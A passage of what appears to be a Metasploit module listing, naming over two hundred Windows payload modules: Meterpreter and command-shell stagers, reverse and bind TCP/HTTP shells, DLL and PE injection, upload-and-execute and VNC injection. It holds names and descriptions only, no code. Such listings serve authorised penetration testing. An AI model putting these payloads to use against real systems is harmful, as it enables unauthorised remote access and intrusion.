   1159  payload/windows/meterpreter/reverse_nonx_tcp                                                normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   1160  payload/windows/meterpreter/reverse_ord_tcp                                                 normal  No     Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   1161  payload/windows/meterpreter/reverse_tcp                                                     normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager
   1162  payload/windows/meterpreter/reverse_tcp_allports                                            normal  No     Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
   1163  payload/windows/meterpreter/reverse_tcp_dns                                                 normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
   1164  payload/windows/meterpreter/reverse_tcp_rc4                                                 normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   1165  payload/windows/meterpreter/reverse_tcp_rc4_dns                                             normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   1166  payload/windows/meterpreter/reverse_tcp_uuid                                                normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager with UUID Support
   1167  payload/windows/meterpreter/reverse_winhttp                                                 normal  No     Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (winhttp)
   1168  payload/windows/meterpreter/reverse_winhttps                                                normal  No     Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (winhttp)
   1169  payload/windows/meterpreter_bind_named_pipe                                                 normal  No     Windows Meterpreter Shell, Bind Named Pipe Inline
   1170  payload/windows/meterpreter_bind_tcp                                                        normal  No     Windows Meterpreter Shell, Bind TCP Inline
   1171  payload/windows/meterpreter_reverse_http                                                    normal  No     Windows Meterpreter Shell, Reverse HTTP Inline
   1172  payload/windows/meterpreter_reverse_https                                                   normal  No     Windows Meterpreter Shell, Reverse HTTPS Inline
   1173  payload/windows/meterpreter_reverse_ipv6_tcp                                                normal  No     Windows Meterpreter Shell, Reverse TCP Inline (IPv6)
   1174  payload/windows/meterpreter_reverse_tcp                                                     normal  No     Windows Meterpreter Shell, Reverse TCP Inline
   1175  payload/windows/metsvc_bind_tcp                                                             normal  No     Windows Meterpreter Service, Bind TCP
   1176  payload/windows/metsvc_reverse_tcp                                                          normal  No     Windows Meterpreter Service, Reverse TCP Inline
   1177  payload/windows/patchupdllinject/bind_hidden_ipknock_tcp                                    normal  No     Windows Inject DLL, Hidden Bind Ipknock TCP Stager
   1178  payload/windows/patchupdllinject/bind_hidden_tcp                                            normal  No     Windows Inject DLL, Hidden Bind TCP Stager
   1179  payload/windows/patchupdllinject/bind_ipv6_tcp                                              normal  No     Windows Inject DLL, Bind IPv6 TCP Stager (Windows x86)
   1180  payload/windows/patchupdllinject/bind_ipv6_tcp_uuid                                         normal  No     Windows Inject DLL, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   1181  payload/windows/patchupdllinject/bind_named_pipe                                            normal  No     Windows Inject DLL, Windows x86 Bind Named Pipe Stager
   1182  payload/windows/patchupdllinject/bind_nonx_tcp                                              normal  No     Windows Inject DLL, Bind TCP Stager (No NX or Win7)
   1183  payload/windows/patchupdllinject/bind_tcp                                                   normal  No     Windows Inject DLL, Bind TCP Stager (Windows x86)
   1184  payload/windows/patchupdllinject/bind_tcp_rc4                                               normal  No     Windows Inject DLL, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   1185  payload/windows/patchupdllinject/bind_tcp_uuid                                              normal  No     Windows Inject DLL, Bind TCP Stager with UUID Support (Windows x86)
   1186  payload/windows/patchupdllinject/find_tag                                                   normal  No     Windows Inject DLL, Find Tag Ordinal Stager
   1187  payload/windows/patchupdllinject/reverse_ipv6_tcp                                           normal  No     Windows Inject DLL, Reverse TCP Stager (IPv6)
   1188  payload/windows/patchupdllinject/reverse_nonx_tcp                                           normal  No     Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
   1189  payload/windows/patchupdllinject/reverse_ord_tcp                                            normal  No     Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
   1190  payload/windows/patchupdllinject/reverse_tcp                                                normal  No     Windows Inject DLL, Reverse TCP Stager
   1191  payload/windows/patchupdllinject/reverse_tcp_allports                                       normal  No     Windows Inject DLL, Reverse All-Port TCP Stager
   1192  payload/windows/patchupdllinject/reverse_tcp_dns                                            normal  No     Windows Inject DLL, Reverse TCP Stager (DNS)
   1193  payload/windows/patchupdllinject/reverse_tcp_rc4                                            normal  No     Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   1194  payload/windows/patchupdllinject/reverse_tcp_rc4_dns                                        normal  No     Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   1195  payload/windows/patchupdllinject/reverse_tcp_uuid                                           normal  No     Windows Inject DLL, Reverse TCP Stager with UUID Support
   1196  payload/windows/patchupmeterpreter/bind_hidden_ipknock_tcp                                  normal  No     Windows Meterpreter (skape/jt Injection), Hidden Bind Ipknock TCP Stager
   1197  payload/windows/patchupmeterpreter/bind_hidden_tcp                                          normal  No     Windows Meterpreter (skape/jt Injection), Hidden Bind TCP Stager
   1198  payload/windows/patchupmeterpreter/bind_ipv6_tcp                                            normal  No     Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager (Windows x86)
   1199  payload/windows/patchupmeterpreter/bind_ipv6_tcp_uuid                                       normal  No     Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
   1200  payload/windows/patchupmeterpreter/bind_named_pipe                                          normal  No     Windows Meterpreter (skape/jt Injection), Windows x86 Bind Named Pipe Stager
   1201  payload/windows/patchupmeterpreter/bind_nonx_tcp                                            normal  No     Windows Meterpreter (skape/jt Injection), Bind TCP Stager (No NX or Win7)
   1202  payload/windows/patchupmeterpreter/bind_tcp                                                 normal  No     Windows Meterpreter (skape/jt Injection), Bind TCP Stager (Windows x86)
   1203  payload/windows/patchupmeterpreter/bind_tcp_rc4                                             normal  No     Windows Meterpreter (skape/jt Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
   1204  payload/windows/patchupmeterpreter/bind_tcp_uuid                                            normal  No     Windows Meterpreter (skape/jt Injection), Bind TCP Stager with UUID Support (Windows x86)
   1205  payload/windows/patchupmeterpreter/find_tag                                                 normal  No     Windows Meterpreter (skape/jt Injection), Find Tag Ordinal Stager
   1206  payload/windows/patchupmeterpreter/reverse_ipv6_tcp                                         normal  No     Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (IPv6)
   1207  payload/windows/patchupmeterpreter/reverse_nonx_tcp                                         normal  No     Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7)
   1208  payload/windows/patchupmeterpreter/reverse_ord_tcp                                          normal  No     Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   1209  payload/windows/patchupmeterpreter/reverse_tcp                                              normal  No     Windows Meterpreter (skape/jt Injection), Reverse TCP Stager
   1210  payload/windows/patchupmeterpreter/reverse_tcp_allports                                     normal  No     Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager
   1211  payload/windows/patchupmeterpreter/reverse_tcp_dns                                          normal  No     Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (DNS)
   1212  payload/windows/patchupmeterpreter/reverse_tcp_rc4                                          normal  No     Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   1213  payload/windows/patchupmeterpreter/reverse_tcp_rc4_dns                                      normal  No     Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   1214  payload/windows/patchupmeterpreter/reverse_tcp_uuid                                         normal  No     Windows Meterpreter (skape/jt Injection), Reverse TCP Stager with UUID Support
   1215  payload/windows/peinject/bind_hidden_ipknock_tcp                                            normal  No     Windows Inject PE Files, Hidden Bind Ipknock TCP Stager
   1216  payload/windows/peinject/bind_hidden_tcp                                                    normal  No     Windows Inject PE Files, Hidden Bind TCP Stager
   1217  payload/windows/peinject/bind_ipv6_tcp                                                      normal  No     Windows Inject PE Files, Bind IPv6 TCP Stager (Windows x86)
   1218  payload/windows/peinject/bind_ipv6_tcp_uuid                                                 normal  No     Windows Inject PE Files, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   1219  payload/windows/peinject/bind_named_pipe                                                    normal  No     Windows Inject PE Files, Windows x86 Bind Named Pipe Stager
   1220  payload/windows/peinject/bind_nonx_tcp                                                      normal  No     Windows Inject PE Files, Bind TCP Stager (No NX or Win7)
   1221  payload/windows/peinject/bind_tcp                                                           normal  No     Windows Inject PE Files, Bind TCP Stager (Windows x86)
   1222  payload/windows/peinject/bind_tcp_rc4                                                       normal  No     Windows Inject PE Files, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   1223  payload/windows/peinject/bind_tcp_uuid                                                      normal  No     Windows Inject PE Files, Bind TCP Stager with UUID Support (Windows x86)
   1224  payload/windows/peinject/find_tag                                                           normal  No     Windows Inject PE Files, Find Tag Ordinal Stager
   1225  payload/windows/peinject/reverse_ipv6_tcp                                                   normal  No     Windows Inject PE Files, Reverse TCP Stager (IPv6)
   1226  payload/windows/peinject/reverse_named_pipe                                                 normal  No     Windows Inject PE Files, Windows x86 Reverse Named Pipe (SMB) Stager
   1227  payload/windows/peinject/reverse_nonx_tcp                                                   normal  No     Windows Inject PE Files, Reverse TCP Stager (No NX or Win7)
   1228  payload/windows/peinject/reverse_ord_tcp                                                    normal  No     Windows Inject PE Files, Reverse Ordinal TCP Stager (No NX or Win7)
   1229  payload/windows/peinject/reverse_tcp                                                        normal  No     Windows Inject PE Files, Reverse TCP Stager
   1230  payload/windows/peinject/reverse_tcp_allports                                               normal  No     Windows Inject PE Files, Reverse All-Port TCP Stager
   1231  payload/windows/peinject/reverse_tcp_dns                                                    normal  No     Windows Inject PE Files, Reverse TCP Stager (DNS)
   1232  payload/windows/peinject/reverse_tcp_rc4                                                    normal  No     Windows Inject PE Files, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   1233  payload/windows/peinject/reverse_tcp_rc4_dns                                                normal  No     Windows Inject PE Files, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   1234  payload/windows/peinject/reverse_tcp_uuid                                                   normal  No     Windows Inject PE Files, Reverse TCP Stager with UUID Support
   1235  payload/windows/pingback_bind_tcp                                                           normal  No     Windows x86 Pingback, Bind TCP Inline
   1236  payload/windows/pingback_reverse_tcp                                                        normal  No     Windows x86 Pingback, Reverse TCP Inline
   1237  payload/windows/powershell_bind_tcp                                                         normal  No     Windows Interactive Powershell Session, Bind TCP
   1238  payload/windows/powershell_reverse_tcp                                                      normal  No     Windows Interactive Powershell Session, Reverse TCP
   1239  payload/windows/powershell_reverse_tcp_ssl                                                  normal  No     Windows Interactive Powershell Session, Reverse TCP SSL
   1240  payload/windows/shell/bind_hidden_ipknock_tcp                                               normal  No     Windows Command Shell, Hidden Bind Ipknock TCP Stager
   1241  payload/windows/shell/bind_hidden_tcp                                                       normal  No     Windows Command Shell, Hidden Bind TCP Stager
   1242  payload/windows/shell/bind_ipv6_tcp                                                         normal  No     Windows Command Shell, Bind IPv6 TCP Stager (Windows x86)
   1243  payload/windows/shell/bind_ipv6_tcp_uuid                                                    normal  No     Windows Command Shell, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   1244  payload/windows/shell/bind_named_pipe                                                       normal  No     Windows Command Shell, Windows x86 Bind Named Pipe Stager
   1245  payload/windows/shell/bind_nonx_tcp                                                         normal  No     Windows Command Shell, Bind TCP Stager (No NX or Win7)
   1246  payload/windows/shell/bind_tcp                                                              normal  No     Windows Command Shell, Bind TCP Stager (Windows x86)
   1247  payload/windows/shell/bind_tcp_rc4                                                          normal  No     Windows Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   1248  payload/windows/shell/bind_tcp_uuid                                                         normal  No     Windows Command Shell, Bind TCP Stager with UUID Support (Windows x86)
   1249  payload/windows/shell/find_tag                                                              normal  No     Windows Command Shell, Find Tag Ordinal Stager
   1250  payload/windows/shell/reverse_ipv6_tcp                                                      normal  No     Windows Command Shell, Reverse TCP Stager (IPv6)
   1251  payload/windows/shell/reverse_nonx_tcp                                                      normal  No     Windows Command Shell, Reverse TCP Stager (No NX or Win7)
   1252  payload/windows/shell/reverse_ord_tcp                                                       normal  No     Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
   1253  payload/windows/shell/reverse_tcp                                                           normal  No     Windows Command Shell, Reverse TCP Stager
   1254  payload/windows/shell/reverse_tcp_allports                                                  normal  No     Windows Command Shell, Reverse All-Port TCP Stager
   1255  payload/windows/shell/reverse_tcp_dns                                                       normal  No     Windows Command Shell, Reverse TCP Stager (DNS)
   1256  payload/windows/shell/reverse_tcp_rc4                                                       normal  No     Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   1257  payload/windows/shell/reverse_tcp_rc4_dns                                                   normal  No     Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   1258  payload/windows/shell/reverse_tcp_uuid                                                      normal  No     Windows Command Shell, Reverse TCP Stager with UUID Support
   1259  payload/windows/shell/reverse_udp                                                           normal  No     Windows Command Shell, Reverse UDP Stager with UUID Support
   1260  payload/windows/shell_bind_tcp                                                              normal  No     Windows Command Shell, Bind TCP Inline
   1261  payload/windows/shell_bind_tcp_xpfw                                                         normal  No     Windows Disable Windows ICF, Command Shell, Bind TCP Inline
   1262  payload/windows/shell_hidden_bind_tcp                                                       normal  No     Windows Command Shell, Hidden Bind TCP Inline
   1263  payload/windows/shell_reverse_tcp                                                           normal  No     Windows Command Shell, Reverse TCP Inline
   1264  payload/windows/speak_pwned                                                                 normal  No     Windows Speech API - Say "You Got Pwned!"
   1265  payload/windows/upexec/bind_hidden_ipknock_tcp                                              normal  No     Windows Upload/Execute, Hidden Bind Ipknock TCP Stager
   1266  payload/windows/upexec/bind_hidden_tcp                                                      normal  No     Windows Upload/Execute, Hidden Bind TCP Stager
   1267  payload/windows/upexec/bind_ipv6_tcp                                                        normal  No     Windows Upload/Execute, Bind IPv6 TCP Stager (Windows x86)
   1268  payload/windows/upexec/bind_ipv6_tcp_uuid                                                   normal  No     Windows Upload/Execute, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   1269  payload/windows/upexec/bind_named_pipe                                                      normal  No     Windows Upload/Execute, Windows x86 Bind Named Pipe Stager
   1270  payload/windows/upexec/bind_nonx_tcp                                                        normal  No     Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
   1271  payload/windows/upexec/bind_tcp                                                             normal  No     Windows Upload/Execute, Bind TCP Stager (Windows x86)
   1272  payload/windows/upexec/bind_tcp_rc4                                                         normal  No     Windows Upload/Execute, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   1273  payload/windows/upexec/bind_tcp_uuid                                                        normal  No     Windows Upload/Execute, Bind TCP Stager with UUID Support (Windows x86)
   1274  payload/windows/upexec/find_tag                                                             normal  No     Windows Upload/Execute, Find Tag Ordinal Stager
   1275  payload/windows/upexec/reverse_ipv6_tcp                                                     normal  No     Windows Upload/Execute, Reverse TCP Stager (IPv6)
   1276  payload/windows/upexec/reverse_nonx_tcp                                                     normal  No     Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
   1277  payload/windows/upexec/reverse_ord_tcp                                                      normal  No     Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
   1278  payload/windows/upexec/reverse_tcp                                                          normal  No     Windows Upload/Execute, Reverse TCP Stager
   1279  payload/windows/upexec/reverse_tcp_allports                                                 normal  No     Windows Upload/Execute, Reverse All-Port TCP Stager
   1280  payload/windows/upexec/reverse_tcp_dns                                                      normal  No     Windows Upload/Execute, Reverse TCP Stager (DNS)
   1281  payload/windows/upexec/reverse_tcp_rc4                                                      normal  No     Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   1282  payload/windows/upexec/reverse_tcp_rc4_dns                                                  normal  No     Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   1283  payload/windows/upexec/reverse_tcp_uuid                                                     normal  No     Windows Upload/Execute, Reverse TCP Stager with UUID Support
   1284  payload/windows/upexec/reverse_udp                                                          normal  No     Windows Upload/Execute, Reverse UDP Stager with UUID Support
   1285  payload/windows/vncinject/bind_hidden_ipknock_tcp                                           normal  No     VNC Server (Reflective Injection), Hidden Bind Ipknock TCP Stager
   1286  payload/windows/vncinject/bind_hidden_tcp                                                   normal  No     VNC Server (Reflective Injection), Hidden Bind TCP Stager
   1287  payload/windows/vncinject/bind_ipv6_tcp                                                     normal  No     VNC Server (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
   1288  payload/windows/vncinject/bind_ipv6_tcp_uuid                                                normal  No     VNC Server (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
   1289  payload/windows/vncinject/bind_named_pipe                                                   normal  No     VNC Server (Reflective Injection), Windows x86 Bind Named Pipe Stager
   1290  payload/windows/vncinject/bind_nonx_tcp                                                     normal  No     VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
   1291  payload/windows/vncinject/bind_tcp                                                          normal  No     VNC Server (Reflective Injection), Bind TCP Stager (Windows x86)
   1292  payload/windows/vncinject/bind_tcp_rc4                                                      normal  No     VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
   1293  payload/windows/vncinject/bind_tcp_uuid                                                     normal  No     VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
   1294  payload/windows/vncinject/find_tag                                                          normal  No     VNC Server (Reflective Injection), Find Tag Ordinal Stager
   1295  payload/windows/vncinject/reverse_hop_http                                                  normal  No     VNC Server (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
   1296  payload/windows/vncinject/reverse_http                                                      normal  No     VNC Server (Reflective Injection), Windows Reverse HTTP Stager (wininet)
   1297  payload/windows/vncinject/reverse_http_proxy_pstore                                         normal  No     VNC Server (Reflective Injection), Reverse HTTP Stager Proxy
   1298  payload/windows/vncinject/reverse_ipv6_tcp                                                  normal  No     VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
   1299  payload/windows/vncinject/reverse_nonx_tcp                                                  normal  No     VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   1300  payload/windows/vncinject/reverse_ord_tcp                                                   normal  No     VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   1301  payload/windows/vncinject/reverse_tcp                                                       normal  No     VNC Server (Reflective Injection), Reverse TCP Stager
   1302  payload/windows/vncinject/reverse_tcp_allports                                              normal  No     VNC Server (Reflective Injection), Reverse All-Port TCP Stager
   1303  payload/windows/vncinject/reverse_tcp_dns                                                   normal  No     VNC Server (Reflective Injection), Reverse TCP Stager (DNS)
   1304  payload/windows/vncinject/reverse_tcp_rc4                                                   normal  No     VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   1305  payload/windows/vncinject/reverse_tcp_rc4_dns                                               normal  No     VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   1306  payload/windows/vncinject/reverse_tcp_uuid                                                  normal  No     VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support
   1307  payload/windows/vncinject/reverse_winhttp                                                   normal  No     VNC Server (Reflective Injection), Windows Reverse HTTP Stager (winhttp)
   1308  payload/windows/x64/custom/bind_ipv6_tcp                                                    normal  No     Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager
   1309  payload/windows/x64/custom/bind_ipv6_tcp_uuid                                               normal  No     Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager with UUID Support
   1310  payload/windows/x64/custom/bind_named_pipe                                                  normal  No     Windows shellcode stage, Windows x64 Bind Named Pipe Stager
   1311  payload/windows/x64/custom/bind_tcp                                                         normal  No     Windows shellcode stage, Windows x64 Bind TCP Stager
   1312  payload/windows/x64/custom/bind_tcp_rc4                                                     normal  No     Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   1313  payload/windows/x64/custom/bind_tcp_uuid                                                    normal  No     Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x64)
   1314  payload/windows/x64/custom/reverse_http                                                     normal  No     Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)
   1315  payload/windows/x64/custom/reverse_https                                                    normal  No     Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)
   1316  payload/windows/x64/custom/reverse_named_pipe                                               normal  No     Windows shellcode stage, Windows x64 Reverse Named Pipe (SMB) Stager
   1317  payload/windows/x64/custom/reverse_tcp                                                      normal  No     Windows shellcode stage, Windows x64 Reverse TCP Stager
   1318  payload/windows/x64/custom/reverse_tcp_rc4                                                  normal  No     Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   1319  payload/windows/x64/custom/reverse_tcp_uuid                                                 normal  No     Windows shellcode stage, Reverse TCP Stager with UUID Support (Windows x64)
   1320  payload/windows/x64/custom/reverse_winhttp                                                  normal  No     Windows shellcode stage, Windows x64 Reverse HTTP Stager (winhttp)
   1321  payload/windows/x64/custom/reverse_winhttps                                                 normal  No     Windows shellcode stage, Windows x64 Reverse HTTPS Stager (winhttp)
   1322  payload/windows/x64/encrypted_shell/reverse_tcp                                             normal  No     Windows Command Shell, Encrypted Reverse TCP Stager
   1323  payload/windows/x64/encrypted_shell_reverse_tcp                                             normal  No     Windows Encrypted Reverse Shell
   1324  payload/windows/x64/exec                                                                    normal  No     Windows x64 Execute Command
   1325  payload/windows/x64/loadlibrary                                                             normal  No     Windows x64 LoadLibrary Path
   1326  payload/windows/x64/messagebox                                                              normal  No     Windows MessageBox x64
   1327  payload/windows/x64/meterpreter/bind_ipv6_tcp                                               normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager
   1328  payload/windows/x64/meterpreter/bind_ipv6_tcp_uuid                                          normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support
   1329  payload/windows/x64/meterpreter/bind_named_pipe                                             normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager
   1330  payload/windows/x64/meterpreter/bind_tcp                                                    normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager
   1331  payload/windows/x64/meterpreter/bind_tcp_rc4                                                normal  No     Windows Meterpreter (Reflective Injection x64), Bind TCP Stager (RC4 Stage Encryption, Metasm)
   1332  payload/windows/x64/meterpreter/bind_tcp_uuid                                               normal  No     Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64)
   1333  payload/windows/x64/meterpreter/reverse_http                                                normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
   1334  payload/windows/x64/meterpreter/reverse_https                                               normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
   1335  payload/windows/x64/meterpreter/reverse_named_pipe                                          normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager
   1336  payload/windows/x64/meterpreter/reverse_tcp                                                 normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
   1337  payload/windows/x64/meterpreter/reverse_tcp_rc4                                             normal  No     Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   1338  payload/windows/x64/meterpreter/reverse_tcp_uuid                                            normal  No     Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64)
   1339  payload/windows/x64/meterpreter/reverse_winhttp                                             normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp)
   1340  payload/windows/x64/meterpreter/reverse_winhttps                                            normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)
   1341  payload/windows/x64/meterpreter_bind_named_pipe                                             normal  No     Windows Meterpreter Shell, Bind Named Pipe Inline (x64)
   1342  payload/windows/x64/meterpreter_bind_tcp                                                    normal  No     Windows Meterpreter Shell, Bind TCP Inline (x64)
   1343  payload/windows/x64/meterpreter_reverse_http                                                normal  No     Windows Meterpreter Shell, Reverse HTTP Inline (x64)
   1344  payload/windows/x64/meterpreter_reverse_https                                               normal  No     Windows Meterpreter Shell, Reverse HTTPS Inline (x64)
   1345  payload/windows/x64/meterpreter_reverse_ipv6_tcp                                            normal  No     Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)
   1346  payload/windows/x64/meterpreter_reverse_tcp                                                 normal  No     Windows Meterpreter Shell, Reverse TCP Inline x64
   1347  payload/windows/x64/peinject/bind_ipv6_tcp                                                  normal  No     Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager
   1348  payload/windows/x64/peinject/bind_ipv6_tcp_uuid                                             normal  No     Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager with UUID Support
   1349  payload/windows/x64/peinject/bind_named_pipe                                                normal  No     Windows Inject Reflective PE Files, Windows x64 Bind Named Pipe Stager
   1350  payload/windows/x64/peinject/bind_tcp                                                       normal  No     Windows Inject Reflective PE Files, Windows x64 Bind TCP Stager
   1351  payload/windows/x64/peinject/bind_tcp_rc4                                                   normal  No     Windows Inject Reflective PE Files, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   1352  payload/windows/x64/peinject/bind_tcp_uuid                                                  normal  No     Windows Inject Reflective PE Files, Bind TCP Stager with UUID Support (Windows x64)
   1353  payload/windows/x64/peinject/reverse_named_pipe                                             normal  No     Windows Inject Reflective PE Files, Windows x64 Reverse Named Pipe (SMB) Stager
   1354  payload/windows/x64/peinject/reverse_tcp                                                    normal  No     Windows Inject Reflective PE Files, Windows x64 Reverse TCP Stager
   1355  payload/windows/x64/peinject/reverse_tcp_rc4                                                normal  No     Windows Inject Reflective PE Files, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   1356  payload/windows/x64/peinject/reverse_tcp_uuid                                               normal  No     Windows Inject Reflective PE Files, Reverse TCP Stager with UUID Support (Windows x64)
   1357  payload/windows/x64/pingback_reverse_tcp                                                    normal  No     Windows x64 Pingback, Reverse TCP Inline
   1358  payload/windows/x64/powershell_bind_tcp                                                     normal  No     Windows Interactive Powershell Session, Bind TCP
   1359  payload/windows/x64/powershell_reverse_tcp                                                  normal  No     Windows Interactive Powershell Session, Reverse TCP
   1360  payload/windows/x64/powershell_reverse_tcp_ssl                                              normal  No     Windows Interactive Powershell Session, Reverse TCP SSL
   1361  payload/windows/x64/shell/bind_ipv6_tcp                                                     normal  No     Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager
   1362  payload/windows/x64/shell/bind_ipv6_tcp_uuid                                                normal  No     Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support
   1363  payload/windows/x64/shell/bind_named_pipe                                                   normal  No     Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager
   1364  payload/windows/x64/shell/bind_tcp                                                          normal  No     Windows x64 Command Shell, Windows x64 Bind TCP Stager
   1365  payload/windows/x64/shell/bind_tcp_rc4                                                      normal  No     Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   1366  payload/windows/x64/shell/bind_tcp_uuid                                                     normal  No     Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)
   1367  payload/windows/x64/shell/reverse_tcp                                                       normal  No     Windows x64 Command Shell, Windows x64 Reverse TCP Stager
   1368  payload/windows/x64/shell/reverse_tcp_rc4                                                   normal  No     Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   1369  payload/windows/x64/shell/reverse_tcp_uuid                                                  normal  No     Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)
   1370  payload/windows/x64/shell_bind_tcp                                                          normal  No     Windows x64 Command Shell, Bind TCP Inline
   1371  payload/windows/x64/shell_reverse_tcp                                                       normal  No     Windows x64 Command Shell, Reverse TCP Inline
   1372  payload/windows/x64/vncinject/bind_ipv6_tcp                                                 normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager
   1373  payload/windows/x64/vncinject/bind_ipv6_tcp_uuid                                            normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager with UUID Support
   1374  payload/windows/x64/vncinject/bind_named_pipe                                               normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Bind Named Pipe Stager
   1375  payload/windows/x64/vncinject/bind_tcp                                                      normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager
   1376  payload/windows/x64/vncinject/bind_tcp_rc4                                                  normal  No     Windows x64 VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
   1377  payload/windows/x64/vncinject/bind_tcp_uuid                                                 normal  No     Windows x64 VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x64)
   1378  payload/windows/x64/vncinject/reverse_http                                                  normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
   1379  payload/windows/x64/vncinject/reverse_https                                                 normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
   1380  payload/windows/x64/vncinject/reverse_tcp                                                   normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager
   1381  payload/windows/x64/vncinject/reverse_tcp_rc4                                               normal  No     Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
